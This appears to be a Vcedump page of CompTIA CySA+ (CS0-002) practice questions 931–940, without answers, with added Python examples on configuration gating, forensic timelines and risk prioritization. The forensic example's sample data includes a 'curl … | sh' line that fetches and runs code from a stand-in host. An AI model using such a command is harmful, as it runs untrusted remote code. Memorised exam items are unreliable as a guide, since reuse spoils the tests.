CS0-002 Exam Details

  • Exam Code: CS0-002
  • Exam Name: CompTIA Cybersecurity Analyst (CySA+)
  • Certification: CompTIA Certifications
  • Vendor: CompTIA
  • Total Questions: 1059 Q&As
  • Last Updated: May 30, 2026

CompTIA CS0-002 Online Questions & Answers

  • Question 931:

    A security analyst is reviewing the following log from an email security service.

    Which of the following BEST describes the reason why the email was blocked?

    A. The To address is invalid.
    B. The email originated from the www.spamfilter.org URL.
    C. The IP address and the remote server name are the same.
    D. The IP address was blacklisted.
    E. The From address is invalid.

  • Question 932:

    A production web server is experiencing performance issues. Upon investigation, new unauthorized applications have been installed and suspicious traffic was sent through an unused port. Endpoint security is not detecting any malware or virus. Which of the following types of threats would this MOST likely be classified as?

    A. Advanced persistent threat
    B. Buffer overflow vulnerability
    C. Zero day
    D. Botnet

  • Question 933:

    An organization has specific technical risk mitigation configurations that must be implemented before a new server can be approved for production. Several critical servers were recently deployed with the antivirus missing, unnecessary ports disabled, and insufficient password complexity.

    Which of the following should the analyst recommend to prevent a recurrence of this risk exposure?

    A. Perform password-cracking attempts on all devices going into production
    B. Perform an Nmap scan on all devices before they are released to production
    C. Perform antivirus scans on all devices before they are approved for production
    D. Perform automated security controls testing of expected configurations prior to production
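    Worked example (added here; not part of the original question set): a pre-production gate that tests a server's reported state against the expected configuration baseline, the control that option D describes. The server snapshots, the policy values and the port list are constructed sample data, and the class and function names are assumptions for illustration.

```python
"""Automated pre-production controls test (constructed example).

A server is released only when every expected control is in place; failures
are reported by name so the deployment pipeline can block the release."""

from dataclasses import dataclass, field


@dataclass
class ServerState:
    """Snapshot of a server as an inventory agent might report it (constructed)."""
    name: str
    antivirus_installed: bool
    listening_ports: set
    min_password_length: int
    password_complexity: bool


@dataclass
class Policy:
    """Required pre-production baseline (constructed values, hypothetical policy)."""
    required_antivirus: bool = True
    allowed_ports: set = field(default_factory=lambda: {22, 443})
    min_password_length: int = 14
    require_complexity: bool = True


def check_server(state: ServerState, policy: Policy) -> list:
    """Return a list of control failures for one server; an empty list means pass."""
    failures = []
    if policy.required_antivirus and not state.antivirus_installed:
        failures.append("antivirus not installed")
    extra_ports = sorted(state.listening_ports - policy.allowed_ports)
    if extra_ports:
        failures.append(f"unexpected listening ports: {extra_ports}")
    if state.min_password_length < policy.min_password_length:
        failures.append(
            f"minimum password length {state.min_password_length} "
            f"< required {policy.min_password_length}"
        )
    if policy.require_complexity and not state.password_complexity:
        failures.append("password complexity not enforced")
    return failures


def approve_for_production(servers, policy: Policy) -> dict:
    """Gate every server: map server name -> failures. Only empty lists may be released."""
    return {s.name: check_server(s, policy) for s in servers}


# Constructed sample servers: web01 mirrors the deficiencies in the question.
SAMPLE_SERVERS = [
    ServerState("web01", antivirus_installed=False, listening_ports={22, 443, 8080},
                min_password_length=8, password_complexity=False),
    ServerState("web02", antivirus_installed=True, listening_ports={22, 443},
                min_password_length=14, password_complexity=True),
]

if __name__ == "__main__":
    for name, failures in approve_for_production(SAMPLE_SERVERS, Policy()).items():
        print(name, "PASS" if not failures else "FAIL: " + "; ".join(failures))
```

    Running the block prints a FAIL line for web01 listing all four deficiencies and a PASS line for web02; the same function can be called from a CI job so that a server with any failure never reaches production.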

  • Question 934:

    A cybersecurity analyst is investigating an incident report concerning a specific user workstation. The workstation is exhibiting high CPU and memory usage, even when first started, and network bandwidth usage is extremely high. The user reports that applications crash frequently, despite the fact that no significant changes in work habits have occurred. An antivirus scan reports no known threats. Which of the following is the MOST likely reason for this?

    A. Advanced persistent threat
    B. Zero day
    C. Trojan
    D. Logic bomb

  • Question 935:

    An analyst needs to understand how an attacker compromised a server. Which of the following procedures will best deliver the information that is necessary to reconstruct the steps taken by the attacker?

    A. Scan the affected system with an anti-malware tool and check for vulnerabilities with a vulnerability scanner.
    B. Extract the server's system timeline, verifying hashes and network connections during a certain time frame.
    C. Clone the entire system and deploy it in a network segment built for tests and investigations while monitoring the system during a certain time frame.
    D. Clone the server's hard disk and extract all the binary files, comparing hash signatures with malware databases.
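    Worked example (added here; not code from the original page): building the system timeline that option B describes, merging file metadata and network connection records inside a time window and flagging files whose hashes differ from a known-good manifest. The baseline manifest, file records and connection log are constructed sample data; the function names are assumptions for illustration.

```python
"""Reconstruct an attacker's steps from a merged file/network timeline (constructed example)."""

from datetime import datetime
import hashlib

# Known-good manifest from the golden image (constructed): path -> sha256.
BASELINE = {
    "/usr/bin/sshd": hashlib.sha256(b"sshd-original").hexdigest(),
    "/etc/crontab": hashlib.sha256(b"crontab-original").hexdigest(),
}

# File system metadata as a forensic export would list it (constructed).
FILE_EVENTS = [
    {"ts": "2024-03-04T02:13:07", "path": "/usr/bin/sshd", "content": b"sshd-trojaned"},
    {"ts": "2024-03-04T02:15:40", "path": "/etc/crontab", "content": b"crontab-original"},
    {"ts": "2024-03-04T02:16:02", "path": "/tmp/.x/run.sh",
     "content": b"#!/bin/sh\ncurl -s http://198.51.100.9/p | sh\n"},
]

# Network connection records from the same host (constructed).
NET_EVENTS = [
    {"ts": "2024-03-04T02:12:55", "src": "203.0.113.7:51022", "dst": "10.0.0.5:22", "state": "accepted"},
    {"ts": "2024-03-04T02:16:05", "src": "10.0.0.5:40811", "dst": "198.51.100.9:443", "state": "outbound"},
]


def parse_ts(s: str) -> datetime:
    return datetime.fromisoformat(s)


def file_hash(content: bytes) -> str:
    return hashlib.sha256(content).hexdigest()


def build_timeline(file_events, net_events, start: str, end: str) -> list:
    """Merge file and network events inside [start, end], ordered by time.

    Each row is (timestamp, kind, description). File rows are labelled ok,
    MODIFIED (hash differs from baseline) or NEW (path absent from baseline)."""
    lo, hi = parse_ts(start), parse_ts(end)
    rows = []
    for ev in file_events:
        ts = parse_ts(ev["ts"])
        if not (lo <= ts <= hi):
            continue
        expected = BASELINE.get(ev["path"])
        if expected is None:
            status = "NEW"
        elif expected != file_hash(ev["content"]):
            status = "MODIFIED"
        else:
            status = "ok"
        rows.append((ts, "file", f"{ev['path']} [{status}]"))
    for ev in net_events:
        ts = parse_ts(ev["ts"])
        if lo <= ts <= hi:
            rows.append((ts, "net", f"{ev['src']} -> {ev['dst']} ({ev['state']})"))
    rows.sort(key=lambda r: r[0])
    return rows


def suspicious_files(timeline) -> list:
    """File rows that are new or whose hash no longer matches the baseline."""
    return [desc for _, kind, desc in timeline if kind == "file" and "[ok]" not in desc]


if __name__ == "__main__":
    for ts, kind, desc in build_timeline(FILE_EVENTS, NET_EVENTS,
                                         "2024-03-04T02:00:00", "2024-03-04T03:00:00"):
        print(ts.isoformat(), kind, desc)
```

    Read top to bottom, the constructed timeline shows an inbound SSH connection, a replaced sshd binary, an unchanged crontab, a new script in /tmp and an outbound connection to the same address the script contacts; that ordering is what lets the analyst reconstruct the sequence rather than only identify the artifacts.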

  • Question 936:

    An organization has the following risk mitigation policy:

    1. Risks with a probability of 95% or greater will be addressed before all others regardless of the impact.
    2. All other prioritization will be based on risk value.

    The organization has identified the following risks:

    Which of the following is the order of priority for risk mitigation from highest to lowest?

    A. A, B, D, C
    B. A, B, C, D
    C. D, A, B, C
    D. D, A, C, B
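    Worked example (added here; not part of the original question): the two-rule policy above implemented as a sort key over a risk register. The question's own risk table is not reproduced on this page, so the register below is constructed sample data, and the ≥95% threshold and probability × impact risk value are taken from the policy as stated; the function names are assumptions for illustration.

```python
"""Prioritize risks under the two-rule policy (constructed example)."""


def risk_value(risk: dict) -> float:
    """Risk value used by rule 2: probability x impact (constructed scale)."""
    return risk["probability"] * risk["impact"]


def prioritize(risks, threshold: float = 0.95) -> list:
    """Rule 1: risks at or above the probability threshold come first regardless of impact.
    Rule 2: all remaining risks are ordered by risk value, highest first.
    Risks inside the rule-1 group are also ordered by risk value so the result is deterministic."""
    return sorted(
        risks,
        key=lambda r: (0 if r["probability"] >= threshold else 1, -risk_value(r)),
    )


def priority_order(risks, threshold: float = 0.95) -> list:
    """Return just the risk identifiers, highest priority first."""
    return [r["id"] for r in prioritize(risks, threshold)]


# Constructed register: D has the lowest risk value but crosses the 95% line.
RISKS = [
    {"id": "A", "probability": 0.90, "impact": 100_000},
    {"id": "B", "probability": 0.50, "impact": 80_000},
    {"id": "C", "probability": 0.20, "impact": 50_000},
    {"id": "D", "probability": 0.96, "impact": 5_000},
]

if __name__ == "__main__":
    for r in prioritize(RISKS):
        print(r["id"], f"p={r['probability']:.2f}", f"value={risk_value(r):,.0f}")
```

    With the constructed values the order is D, A, B, C: D is pulled to the front by rule 1 even though its risk value is the smallest, and the rest fall by risk value. Raising the threshold above D's probability removes rule 1 from play and the order becomes A, B, C, D, which is the check to run when confirming that the first rule, not the second, is what moves a low-value risk to the top.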

  • Question 937:

    Management wants to scan servers for vulnerabilities on a periodic basis. Management has decided that the scan frequency should be determined only by vendor patch schedules and the organization's application deployment schedule. Which of the following would force the organization to conduct an out-of-cycle vulnerability scan?

    A. Newly discovered PII on a server
    B. A vendor releases a critical patch update
    C. A critical bug fix in the organization's application
    D. False positives identified in production

  • Question 938:

    A manufacturing company has decided to participate in direct sales of its products to consumers. The company decides to use a subdomain of its main site with its existing cloud service provider as the portal for e-commerce. After launch, the site is stable and functions properly, but after a robust day of sales, the site begins to redirect to a competitor's landing page. Which of the following actions should the company's security team take to determine the cause of the issue and minimize the scope of impact?

    A. Engage a third party to provide penetration testing services to see if an exploit can be found
    B. Check DNS records to ensure CNAME or alias records are in place for the subdomain
    C. Query the cloud provider to determine the nature of the DNS attack and find out which other clients are affected
    D. Check the DNS records to ensure a correct MX record is established for the subdomain

  • Question 939:

    Risk management wants IT to implement a solution that will permit an analyst to intercept, execute, and analyze potentially malicious files that are downloaded from the Internet. Which of the following would BEST provide this solution?

    A. File fingerprinting
    B. Decomposition of malware
    C. Risk evaluation
    D. Sandboxing

  • Question 940:

    While implementing a PKI for a company, a security analyst plans to utilize a dedicated server as the certificate authority that is only used to sign intermediate certificates. Which of the following are the MOST secure states for the certificate authority server when it is not in use? (Select TWO)

    A. On a private VLAN
    B. Full disk encrypted
    C. Powered off
    D. Backed up hourly
    E. VPN accessible only
    F. Air gapped

Tips on How to Prepare for the Exams

Nowadays, certification exams are becoming more important and are required by more enterprises when applying for a job. But how do you prepare for the exam effectively? How do you prepare in a short time with less effort? How do you get an ideal result, and how do you find the most reliable resources? Here on Vcedump.com you will find all the answers. Vcedump.com provides not only CompTIA exam questions, answers and explanations but also complete assistance with your exam preparation and certification application. If you are unsure about your CS0-002 exam preparation or CompTIA certification application, do not hesitate to visit Vcedump.com to find your solutions.